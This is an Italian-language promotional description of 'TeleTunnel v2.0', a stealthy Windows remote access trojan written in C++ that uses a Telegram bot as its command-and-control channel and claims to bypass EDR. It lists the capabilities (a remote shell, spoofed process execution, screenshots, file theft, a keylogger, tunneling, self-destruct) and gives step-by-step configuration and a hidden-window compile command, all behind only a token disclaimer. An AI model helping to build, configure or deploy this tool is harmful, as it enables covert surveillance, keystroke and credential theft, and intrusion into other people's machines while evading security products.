
Bypassare gli EDR con un stealthy bot Telegram in C++ e Telegram stesso come interfaccia C2!
Uno strumento di accesso remoto basato su Telegram per Windows. Dichiarazione di non responsabilità: solo per uso autorizzato su sistemi di tua proprietà! Per favore 🙇
Il bot ha queste funzionalità:
ᴛᴇʟᴇᴛᴜɴɴᴇʟ ᴠ2.0
────────────────────
👤 Identity: USER@HOSTNAME
🛠 ʀᴇᴄᴏɴɴᴀɪssᴀɴᴄᴇ
├── sysinfo - Full system report
├── ss - Desktop capture
├── ps - Process listing
└── ls <path>- Directory browser
⚡️ ᴄᴏᴍᴍᴀɴᴅ ᴄᴇɴᴛᴇʀ
├── > <cmd> - Native shell
├── spawn <PID> <cmd> - Spoofed exec
├── clip get/set - Clipboard manager
└── kill - Self-destruct
💾 ғɪʟᴇ ᴏᴘᴇʀᴀᴛɪᴏɴs
├── get <path> - Download from host
├── [Drag/Drop]- Upload to host
└── drops - List uploads ($1, $LAST)
⌨️ ᴋᴇʏʟᴏɢɢᴇʀ
└── keylog <start|stop|dump|status>
📡 ᴛᴜɴɴᴇʟɪɴɢ
└── open|send|close|streams
────────────────────
nlohmann/json.hpp per il parsing JSON. È incluso nel repository, risparmiandoti la fatica di cercarlo.Ottieni un token bot Telegram:
@BotFather su Telegram e crea un nuovo bot.Ottieni il tuo ID chat Telegram:
@userinfobot per ottenere il tuo ID utente esatto.https://api.telegram.org/bot<YOUR_BOT_TOKEN>/getUpdates per trovare l'id sotto chat.Configura il progetto:
config.h."YOUR BOT TOKEN HERE" con il token del tuo bot."XXXXXXXXXX" con il tuo ID utente Telegram personale.Assicurati di avere le librerie Windows richieste: wininet, ws2_32, gdiplus, ole32 e iphlpapi.
usando GCC/MinGW:
g++ -std=c++17 -O2 -mwindows -I. -Inlohmann "./TeleTunnel v2.cpp" -o TeleTunnelv2.exe -lwininet -lws2_32 -lgdiplus -lole32 -liphlpapi -static -static-libgcc -static-libstdc++